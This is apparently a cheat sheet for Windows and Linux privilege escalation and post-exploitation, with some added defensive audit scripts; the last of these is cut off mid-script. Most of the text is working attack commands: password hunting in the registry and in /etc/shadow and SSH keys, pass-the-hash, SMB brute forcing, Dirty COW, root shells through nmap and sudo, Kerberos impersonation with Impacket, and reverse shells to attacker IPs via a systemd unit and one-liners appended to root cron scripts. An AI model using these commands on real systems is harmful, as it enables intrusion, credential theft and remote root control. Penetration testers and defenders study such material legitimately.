The following commands are used to search for passwords in the registry:
reg query HKLM /f password /t REG_SZ /s
reg query HKU /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Insufficient Physical Access Manipulation Protection

Further privilege escalation attack vectors exist if physical access to the target system is available. This section describes how privileges can be escalated on a system to which an attacker has physical access and which is insufficiently protected against file manipulation. The following graph depicts the possibilities to elevate privileges by attacking devices to which we have physical access:

Find All Servers Where Domain Admins Are Registered to Run Services

If we are using a domain user or the local system from a particular domain computer, use the following command:
Get-SPN -type group -search "Domain Admins" -List yes | Format-Table -Autosize
For a non-domain system with domain credentials we can use the command below:
Get-SPN -type group -search "Domain Admins" -List yes -DomainController 192.168.1.100 -Credential domainuser | Format-Table -Autosize

Discovering the Service Accounts

By doing an SPN scan for user accounts with Service Principal Names, the service accounts and the servers they are used on can be identified.
PS C:\> get-aduser -filter {ServicePrincipalName -like "*"} -Properties PasswordLastSet,LastLogonDate,ServicePrincipalName,TrustedForDelegation,TrustedtoAuthForDelegation

Winexe

Linux binary: pth-winexe
Example with PTH:
pth-winexe -U ./Administrator%aad3b435b51404eeaad3b435b51404ee:4b579a266f697c2xxxxxxxxx //10.145.X.X cmd.exe
pth-winexe -U EXAMPLE/Administrator%example@123 //10.145.X.X cmd.exe
If we want to log in as NT AUTHORITY\SYSTEM, use --system.

R-services

If there are any r-services enabled these are what you should try out; you may be lucky and get logged in directly.
#rlogin -l root // will directly log you in
You can try an rlogin brute force using an Nmap script:
#nmap -p513 --script rlogin-brute
#rusers -al
#rwho

SMB enumeration

This is what you might come across pretty often.
#enum4linux -a //performs all basic enumeration using an smb null session.
#enum4linux -U 192.168.1.2 //-U will get the user list
An SMB null session is an unauthenticated NetBIOS session between two computers. SMB null sessions are available on SMB1 systems only, i.e. 2000, XP, 2003.
To use an SMB null session:
#rpcclient -U "" 192.168.1.2 //when asked, enter an empty password
#rpcclient $>srvinfo
#rpcclient $>enumdomusers
#rpcclient $>querydominfo
#rpcclient $>getdompwinfo //password policy
#rpcclient $>netshareenum
#nmblookup -A 192.168.1.1
#rpcinfo -p
Enumerate using smbclient:
#smbclient -L //192.168.1.2
#smbclient //192.168.1.2/myshare -U anonymous
smb> get data.txt
smb> put evil.txt
Brute force SMB passwords:
#nmap -p445 --script=smb-brute.nse
Brute force should always be your last option. You can also use hydra to do it.
Using nmap:
#nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.1.200-254
#nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.1.0/24
Windows null session:
C:\>net use \\TARGET\IPC$ "" /u:""
Use acccheck to find a username/password over SMB:
#acccheck -v -t 192.168.1.2 -u -P /usr/share/dirb/wordlist/common.txt
#acccheck -t 192.168.1.2 -U /root/users.txt -P /root/Pass.txt
Once you have user creds, use them to see the shares with smbmap:
#smbmap -u -p -d -H
#smbmap -u user -p pass -d workgroup -H 192.168.1.2
#smbmap -L -u user -p pass -d workgroup -H 192.168.1.2
If you have only read privilege, read the shares:
#smbmap -r -u user -p pass -d workgroup -H 192.168.1.2

Dirty COW

https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
Exploiting a vulnerable machine via dirtycow:
$ whoami - tells us the current user is john (non-root user)
$ uname -a - gives us the kernel version, which we know is vulnerable to dirtycow
> Downloaded the dirtycow exploit from here: https://www.exploit-db.com/exploits/40839/
> Compiled and executed it. It replaces the 'root' user with a new user 'rash' by editing the /etc/passwd file.
$ su rash - changes the current logged-in user to 'rash', which is root.

Exploiting a vulnerable SUID executable to get root access
$ find / -perm -u=s -type f 2>/dev/null - prints the executables which have the SUID bit set
$ ls -la /usr/local/bin/nmap - confirm whether nmap has the SUID bit set or not.

Exploiting misconfigured sudo rights to get root access
$ sudo -l - prints the commands which we are allowed to run with sudo
$ sudo find /home -exec sh -i \; - find's -exec parameter can be used for arbitrary code execution.

Exploiting badly configured cron jobs to get root access
$ ls -la /etc/cron.d - lists the cron jobs already present in cron.d
$ find / -perm -2 -type f 2>/dev/null - prints world-writable files
$ ls -la /usr/local/sbin/cron-logrotate.sh - confirm whether cron-logrotate.sh is world-writable.
$ echo "chown root:root /tmp/rootme; chmod u+s /tmp/rootme;" > /usr/local/sbin/cron-logrotate.sh - this will change the executable's owner and group to root and set the SUID bit.
$ ls -la rootme - after 5 minutes the logrotate cron job ran and cron-logrotate.sh was executed with root privileges.
$ ./rootme - spawns a root shell.
> Now, if a root user executes the code with root privileges, we can achieve arbitrary code execution with root privileges.
$ ls - executed the ./ls file instead of running the list command.

Operating System

What's the distribution type? What version?
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release      # Debian based
cat /etc/redhat-release   # Redhat based
What's the kernel version? Is it 64-bit?
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-
What can be learnt from the environment variables?
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set
Is there a printer?
lpstat -a

Applications & Services

What services are running? Which service has which user privilege?
ps aux
ps -ef
top
cat /etc/services
Which service(s) are being run by root? Of these services, which are vulnerable? It's worth a double check!
ps aux | grep root
ps -ef | grep root
What applications are installed? What version are they? Are they currently running?
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archives
ls -alh /var/cache/yum/
Are any of the service settings misconfigured? Are any (vulnerable) plugins attached?
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'
What jobs are scheduled?
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
Any plain text usernames and/or passwords?
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"   # Joomla

Communications & Networking

What NIC(s) does the system have? Is it connected to another network?
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network
What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname
What other users & hosts are communicating with the system?
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
What's cached? IP and/or MAC addresses
arp -e
route
/sbin/route -nee
Is packet sniffing possible? What can be seen?
Listen to live traffic
tcpdump 'tcp and dst host 192.168.1.7 and dst port 80 or tcp and dst host 10.5.5.252 and dst port 21'
Note: tcpdump 'tcp and dst host [ip] and dst port [port]'
Have you got a shell? Can you interact with the system?
nc -lvp 4444    # Attacker. Input (Commands)
nc -lvp 4445    # Attacker. Output (Results)
telnet [attacker ip] 4444 | /bin/sh | telnet [attacker ip] 4445    # On the target system. Use the attacker's IP!
Note: http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/
Is port forwarding possible? Redirect and interact with traffic from another view
Note: http://www.boutell.com/rinetd/
Note: http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch
Note: http://downloadcenter.mcafee.com/products/tools/foundstone/fpipe2_1.zip
Note: FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7
Note: ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
ssh -L 8080:127.0.0.1:80 root@192.168.1.7    # Local Port
ssh -R 8080:127.0.0.1:80 root@192.168.1.7    # Remote Port
Note: mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.5.5.151 80 >backpipe    # Port Relay
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe    # Proxy (Port 80 to 8080)
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe    # Proxy monitor (Port 80 to 8080)
Is tunnelling possible? Send commands locally, remotely
ssh -D 127.0.0.1:9050 -N [username]@[ip]
proxychains ifconfig

Confidential Information & Users

Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
id
who
w
last
cat /etc/passwd | cut -d: -f1    # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'    # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd    # List of super users
cat /etc/sudoers
sudo -l
What sensitive files can be found?
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/
Anything "interesting" in the home directory(s)? If it's possible to access
ls -ahlR /root/
ls -ahlR /home/
Are there any passwords in scripts, databases, configuration files or log files? Default paths and locations for passwords
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
What has the user been doing? Is there any password in plain text? What have they been editing?
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
What user information can be found?
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root
Can private-key information be found?
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key

File Systems

Which configuration files can be written in /etc/? Able to reconfigure a service?
ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null    # Anyone
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null    # Owner
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null    # Group
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null    # Other
find /etc/ -readable -type f 2>/dev/null    # Anyone
find /etc/ -maxdepth 1 -readable -type f 2>/dev/null    # Anyone
What can be found in /var/ ?
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases

Any settings/files (hidden) on the website? Any settings file with database information?
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/

Is there anything in the log file(s)? (Could help with "Local File Includes"!)
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/
Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp
Note: http://www.thegeekstuff.com/2011/08/linux-var-log-files/

If commands are limited, can you break out of the "jail" shell?
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i

How are file-systems mounted?
mount
df -h

Are there any unmounted file-systems?
cat /etc/fstab

What "Advanced Linux File Permissions" are used?
Sticky bits, SUID & SGID
find / -perm -1000 -type d 2>/dev/null    # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the owner, not the user who started it.
find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null    # SGID or SUID (parentheses needed: without them -type f only applies to the SUID test)
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done    # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)
# find starting at root (/), SGID or SUID, not symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -maxdepth 3 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null

Where can be written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm
find / -writable -type d 2>/dev/null    # folders writable by the current user
find / -perm -222 -type d 2>/dev/null    # world-writeable folders
find / -perm -o=w -type d 2>/dev/null    # world-writeable folders
find / -perm -o=x -type d 2>/dev/null    # world-executable folders
find / \( -perm -o=w -perm -o=x \) -type d 2>/dev/null    # world-writeable & executable folders

Any "problem" files? World-writeable, "nobody" files
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print    # world-writeable folders without the sticky bit
find /dir -xdev \( -nouser -o -nogroup \) -print    # No-owner files

Preparation & Finding Exploit Code

What development tools/languages are installed/supported?
find / -name 'perl*'
find / -name 'python*'
find / -name 'gcc*'
find / -name cc

How can files be uploaded?
find / -name wget
find / -name 'nc*'
find / -name 'netcat*'
find / -name 'tftp*'
find / -name ftp

http://www.vulnview.com/cve-details.php?cvename=[CVE]

(Quick) "Common" exploits. Warning: pre-compiled binary files.
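The SUID/SGID and world-writable searches earlier in this section are the same checks a defender should run on a schedule and diff against a baseline, so that a new set-id binary or an unsticky world-writable directory shows up as a change rather than being found by the next person to enumerate the box. The script below is an added example, not part of the original cheat sheet; it assumes GNU find on Linux, and the sample tree it builds with mktemp is constructed purely for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original cheat sheet): audit a tree for the
# "advanced permission" findings listed above. Assumes GNU find on Linux.
# demo_tree() builds a constructed sample tree under mktemp -d.

# Print "BITS<TAB>path" for every SUID/SGID regular file under $1.
# The parentheses matter: find's implicit -a binds tighter than -o, so
# "-perm -g=s -o -perm -u=s -type f" would apply -type f to the SUID
# test only.
audit_setid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort |
    while IFS= read -r f; do
        bits=""
        [ -u "$f" ] && bits="${bits}SUID "
        [ -g "$f" ] && bits="${bits}SGID "
        printf '%s\t%s\n' "${bits% }" "$f"
    done
}

# Directories anyone may write to that lack the sticky bit: in such a
# directory any user can delete or rename other users' files.
# "-perm -o=w" is the spelling find accepts ("-perm -o w" is an error).
audit_world_writable_dirs() {
    find "$1" -type d -perm -o=w ! -perm -1000 2>/dev/null | sort
}

# Paths from audit_setid that are not in the baseline file (one path per
# line). Capture the baseline once on a known-good host; a new entry here
# is what a periodic check should alert on.
audit_setid_diff() {
    audit_setid "$1" | cut -f2 | grep -v -x -F -f "$2" || true
}

# Constructed sample tree: two set-id files, one plain file, one sticky
# world-writable dir (expected, like /tmp) and one without the sticky bit.
demo_tree() {
    t=$(mktemp -d)
    mkdir -p "$t/bin" "$t/tmp" "$t/dropbox"
    chmod 0755 "$t/bin"
    : > "$t/bin/passwd-like"; chmod 4755 "$t/bin/passwd-like"   # SUID
    : > "$t/bin/wall-like";   chmod 2755 "$t/bin/wall-like"     # SGID
    : > "$t/bin/ls-like";     chmod 0755 "$t/bin/ls-like"       # neither
    chmod 1777 "$t/tmp"       # world-writable + sticky: fine
    chmod 0777 "$t/dropbox"   # world-writable, no sticky: flagged
    printf '%s\n' "$t"
}

# With no arguments run against the constructed tree; with one argument
# audit that directory (e.g. sh audit.sh /usr).
if [ $# -eq 0 ]; then
    T=$(demo_tree)
    echo "== SUID/SGID files =="; audit_setid "$T"
    echo "== world-writable dirs without sticky bit =="; audit_world_writable_dirs "$T"
    printf '%s\n' "$T/bin/passwd-like" > "$T/baseline.txt"
    echo "== set-id files not in baseline =="; audit_setid_diff "$T" "$T/baseline.txt"
    rm -rf "$T"
else
    audit_setid "$1"; audit_world_writable_dirs "$1"
fi
```

Run it once as root on a clean host, keep the audit_setid output as the baseline, and let cron run audit_setid_diff against it; `find / -writable` from the list above is deliberately not used here because it reports what the current user can write, which depends on who runs the audit.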
Use at your own risk
http://web.archive.org/web/20111118031158/http://tarantula.by.ru/localroot/
http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/

Mitigations

Try doing it! Set up a cron job which automates script(s) and/or 3rd party products

Is the system fully patched? Kernel, operating system, all applications, their plugins and web services
apt-get update && apt-get upgrade
yum update

Are services running with the minimum level of privileges required? For example, do you need to run MySQL as root?

Scripts

Can any of this be automated?!

Nmap is a scanner for network and OS service detection. However, if it is misconfigured to run with "sudo" or "administrator" privileges, it can lead to privilege escalation.
1. Check what sudo permissions the current user has, ideally "NOPASSWD"
sudo -l
2. Execute Nmap in interactive mode
sudo nmap --interactive
3. Nmap has been run with "sudo" privileges. Run a shell inside the Nmap interactive prompt
!bash or !sh
whoami

1. With the sticky bit permission set I get a root shell using '!sh' and now '!bash', so it is worth trying different shells.
ls -l /usr/local/bin/nmap
2. Accessing interactive mode we can run the shell
nmap --interactive
!bash
whoami
exit
!sh
whoami

1. In case "--interactive" is not an option
sudo -l
sudo -u root nmap --interactive
2. We will now try playing with environment variables and a script file
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF
3. We are now root
bash
whoami; date; hostname

In order for the technique to work, the WebDav service needs to be running, because WebDav does not negotiate signing and therefore authentication relays from the current machine account will be allowed.
Enable WebClient Service:

```cpp
#include <windows.h>
#include <evntprov.h>

int main()
{
    // Provider GUID of the WebClient lookup service trigger
    const GUID _MS_Windows_WebClntLookupServiceTrigger_Provider =
        { 0x22B6D684, 0xFA63, 0x4578, { 0x87, 0xC9, 0xEF, 0xFC, 0xBE, 0x66, 0x43, 0xC7 } };
    REGHANDLE Handle;
    bool success = false;
    if (EventRegister(&_MS_Windows_WebClntLookupServiceTrigger_Provider, nullptr, nullptr, &Handle) == ERROR_SUCCESS)
    {
        EVENT_DESCRIPTOR desc;
        EventDescCreate(&desc, 1, 0, 0, 4, 0, 0, 0);
        // Writing the event fires the service trigger that starts WebClient
        success = EventWrite(Handle, &desc, 0, nullptr) == ERROR_SUCCESS;
        EventUnregister(Handle);
    }
    return success;
}
```

The above process can be conducted directly from Impacket by using the "getST" Python utility. Compared to Rubeus, the tool does not need the hash of the machine account password but the plain-text password. A service ticket can be requested by executing the following command:
getST.py -spn cifs/hive.purple.lab purple.lab/Desktop-Pentestlab\$ -impersonate administrator
The ticket will be saved as .ccache in the current working directory.

Convert Ticket:
The final ticket granting ticket (TGT) from Rubeus is base64 encoded. In order to be used for Kerberos authentication the ticket needs to be in .ccache format. Executing the following command will decode the ticket and write the output into a .kirbi file.
echo "base64" | base64 -d > admin.kirbi
Impacket contains a Python utility which can convert Kerberos tickets with the .kirbi extension to .ccache.
ticketConverter.py /home/kali/admin.kirbi admin.ccache

Access via Kerberos Authentication
Obtaining a ticket which belongs to an administrator account means that it could be used to access the target service from an elevated point of view. Both "wmiexec" and "psexec" from Impacket support Kerberos authentication and therefore could be utilized to access the host as Administrator or SYSTEM, completing the privilege escalation scenario.
wmiexec.py -k -no-pass purple.lab/administrator@hive.purple.lab
Executing "psexec" will create a service on the target host and is not considered opsec safe. However, it could be executed by specifying the administrator account and the target host with the "-k" and "-no-pass" flags to use Kerberos authentication.
psexec.py -k -no-pass purple.lab/administrator@hive.purple.lab

Let's try to view the OS release of the lab machine by executing:
$ lsb_release -a
We can also see the kernel version:
$ uname -a
We first move to the tmp directory, where we will be able to create a file, paste the exploit code and then compile it. The commands we should run are:
$ cd /tmp
$ touch exploit.c
$ vim exploit.c
Then, we should paste the exploit code inside the file, save and exit. Now, we have to compile the exploit. To do this we run:
$ gcc exploit.c -o exploit
And now we only have to execute the exploit file to see if our exploit works, by running:
$ ./exploit
The python command you can see was used to get a proper shell. The command used:
$ python -c 'import pty; pty.spawn("/bin/bash")'
As we can see, we can execute shell commands by typing "!" followed by the command we would like to execute. Thus, the "!sh" command should normally pop a shell. And as nmap has the SUID flag, we should normally get a root shell.

Linux Privilege Escalation with Setuid and Nmap
I was specifically looking for executable files where the setuid parameter was marked and where the owner was root. This essentially means that when the program is executed it runs with the permissions of the owner of the file (the EUID, the Effective User ID, is root), in this case root.
We would look for these types of file with the below find command:
find / -user root -perm -4000 -exec ls -la {} \;

nmap --interactive
nmap> !whoami
!whoami
root
waiting to reap child : No child processes
nmap> !sh
!sh
# id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
#

Most common techniques for privilege escalation in Linux environments: Method #1: Find setuids. Fortunately, Metasploit has a Meterpreter script, getsystem, that will use a number of different techniques to attempt to gain …
Linux Privilege Escalation Methods. Windows Local Privilege Escalation. The types of Privilege Escalation attacks can be broadly categorized into: Horizontal Privilege Escalation. This escalation attack allows attackers to easily elevate their privilege to that of a Domain Admin once they compromise a regular user in the domain.
Look for any of those using the find command:
find / -perm -4000 -ls 2> /dev/null
Metasploit's "Service Trusted Path Privilege Escalation" exploit takes advantage of the unquoted service paths vulnerability outlined in CVE-2005-1185, CVE-2005-2938 and CVE-2000-1128. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.8.
Adapt - Customize the exploit, so it fits. Become command-line options.

0. Prepare your payload root.service
```
[Unit]
Description=roooooooooot

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1'

[Install]
WantedBy=multi-user.target
```
1. Find files/directories that are writable
find / -maxdepth 2 -type f -writable
or
find / -maxdepth 2 -type d -writable
2. Transfer the payload (or just write the file there using vi)
Init the target listening on the port
nc -vl 44444 > root.service
Send the file to the target
nc -n TargetIP 44444 < root.service
3. Start listening on 9999
nc -lvnp 9999
4.
Execute the payload (assume the file is under /dev/shm)
/bin/systemctl enable /dev/shm/root.service
Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /dev/shm/root.service
Created symlink from /etc/systemd/system/root.service -> /dev/shm/root.service
/bin/systemctl start root
5. The nc listening on 9999 would give you the root shell
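The "Created symlink ... -> /dev/shm/root.service" output above is the artefact a defender can look for: systemd happily enables a unit from any path, so the check is whether an enabled unit resolves to somewhere outside the trusted unit directories, or whether the unit file itself is writable by group or others. The script below is an added example and not part of the write-up above; it assumes GNU find and readlink (Linux), and the tree built by demo_tree() is constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not part of the write-up above): find enabled systemd
# units that resolve to a location outside the trusted unit directories,
# or whose unit file is writable by group/other, which is the precondition
# the /dev/shm/root.service trick relies on. Assumes GNU find/readlink.
# demo_tree() builds a constructed tree; on a real host run it as
#   sh audit-units.sh /etc/systemd/system

TRUSTED_UNIT_DIRS="/etc/systemd/system /usr/lib/systemd/system /lib/systemd/system"

# in_trusted_dir PATH [EXTRA_DIR]: true if PATH lies under a trusted dir.
in_trusted_dir() {
    for d in $TRUSTED_UNIT_DIRS ${2:-}; do
        case "$1" in "$d"/*) return 0 ;; esac
    done
    return 1
}

# audit_units ROOT [EXTRA_TRUSTED_DIR]: for every *.service file or symlink
# under ROOT (symlinks are how *.wants/ directories reference units) print
# "REASON<TAB>unit<TAB>resolved target" for each finding.
audit_units() {
    root=$1; extra=${2:-}
    find "$root" \( -type f -o -type l \) -name '*.service' 2>/dev/null | sort |
    while IFS= read -r u; do
        target=$(readlink -f "$u" 2>/dev/null) || target=$u
        if ! in_trusted_dir "$target" "$extra"; then
            printf 'UNTRUSTED_LOCATION\t%s\t%s\n' "$u" "$target"
        fi
        # -perm /022: writable by group or other
        if [ -f "$target" ] && find "$target" -maxdepth 0 -perm /022 | grep -q .; then
            printf 'WRITABLE_UNIT\t%s\t%s\n' "$u" "$target"
        fi
    done
}

# Constructed tree: a normal unit plus one enabled from a world-writable
# file in a /dev/shm lookalike, the way "systemctl enable /dev/shm/root.service"
# leaves the wants directory.
demo_tree() {
    t=$(readlink -f "$(mktemp -d)")
    mkdir -p "$t/etc/systemd/system/multi-user.target.wants" "$t/dev/shm"
    printf '[Service]\nExecStart=/usr/sbin/sshd -D\n' > "$t/etc/systemd/system/good.service"
    chmod 0644 "$t/etc/systemd/system/good.service"
    ln -s "$t/etc/systemd/system/good.service" "$t/etc/systemd/system/multi-user.target.wants/good.service"
    printf '[Service]\nUser=root\nExecStart=/bin/sh -c true\n' > "$t/dev/shm/root.service"
    chmod 0666 "$t/dev/shm/root.service"
    ln -s "$t/dev/shm/root.service" "$t/etc/systemd/system/multi-user.target.wants/root.service"
    printf '%s\n' "$t"
}

if [ $# -eq 0 ]; then
    T=$(demo_tree)
    # the constructed etc/systemd/system stands in for the real trusted dir
    audit_units "$T/etc/systemd/system" "$T/etc/systemd/system"
    rm -rf "$T"
else
    audit_units "$@"
fi
```

On a real host the second argument is not needed; it exists only so the constructed tree can be treated as trusted. A unit that is both UNTRUSTED_LOCATION and WRITABLE_UNIT is exactly the state the numbered steps above leave behind.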
Linux Privilege Escalation: Quick and Dirty
A quick and dirty Linux Privilege Escalation cheat sheet. I have utilized all of these privilege escalation techniques at least once.
Published on Aug 10, 2020

Automated Tooling
Usually, my approach is to use an automated tool in conjunction with some manual enumeration. However, you can completely accomplish the privilege escalation process with an automated tool paired with the right exploitation methodology.
1. Linpeas.sh (my go-to, fully automated)
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
2. Linprivchecker.py (my backup)
https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py
3. Linux-Exploit-Suggest-2.pl (to look for those sneaky little kernel exploits)
https://github.com/jondonas/linux-exploit-suggester-2

Resources
Keep in mind that these are just some of the techniques I have used. You'll find that some of the existing Linux privilege escalation guides are much more comprehensive:
1. The Holy Grail
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
2. My Second Favorite Guide
https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_inux.html__
3.
GTFOBins (The most comprehensive binary privesc guide)
https://gtfobins.github.io/

Techniques

God Mode
history
I know, seems crazy, the history command? Why? Well, I've successfully performed privilege escalation from finding hints or credentials in the user's history.

Capabilities
If there's a capability that has cap_setuid+ep, the command might be able to be abused.
Example: /usr/bin/python2.6 = cap_setuid+ep
For instance, I used this cheat sheet for capability exploits
ref: https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/

Changing WordPress Password via MySQL DB
I came across a situation in which taking over the WordPress website was essentially part of the privilege escalation process due to versioning.
Find MySQL credentials
Connect to the localhost database
mysql -h localhost -u user -p
Authenticate using the credentials you found
Select the database that has the credentials table
USE databasename;
Change the admin password or user's password that you have access to
UPDATE wp_users SET user_pass=MD5('P@ssw0rd123!') WHERE user_login='wpadmin';
KEY: wp_users is the table, SET is for the user password field in the table, and WHERE is for the user login field within the table. (WordPress accepts an MD5 hash in user_pass and rehashes it on the next login; MySQL's PASSWORD() format is not a hash WordPress checks.)

Permissive Root Script
If a cron job is running a script as root, determine what the script is doing. If you have full permission to edit the script, you're golden. Note: the >> in the one-liner echo appends to the file rather than overwriting it. Two of my favorite examples:
Python One-Liner
echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.10",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' >> test.py
Bash One-Liner (if the script is a .sh)
echo "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.10 7242 > /tmp/f" >> monitor.sh
Now set up a listener on the defined port, and wait for the script to run.
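The precondition for the "permissive root script" trick is a root cron entry whose script (or the directory it lives in) a non-root user can write, and that is a cheap thing to audit from the other side. The script below is an added example, not from the post; it reads a system-crontab-style file (minute hour dom mon dow user command, as in /etc/crontab and /etc/cron.d), assumes GNU find, and the crontab and scripts written by demo_setup() are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the post): list cron jobs that run as root but
# whose script a non-root user could change, the precondition behind the
# "permissive root script" trick. Works on a system-crontab-style file
# (m h dom mon dow user command), e.g. /etc/crontab or a file in
# /etc/cron.d. demo_setup() writes a constructed crontab and scripts.

# root_cron_scripts FILE [USER]: print the program path of each entry that
# runs as USER (default root). Comments, blank lines and VAR=value lines
# are skipped; @reboot-style entries have the user in field 2.
root_cron_scripts() {
    awk -v who="${2:-root}" '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }
        /^[A-Za-z_][A-Za-z0-9_]*=/          { next }
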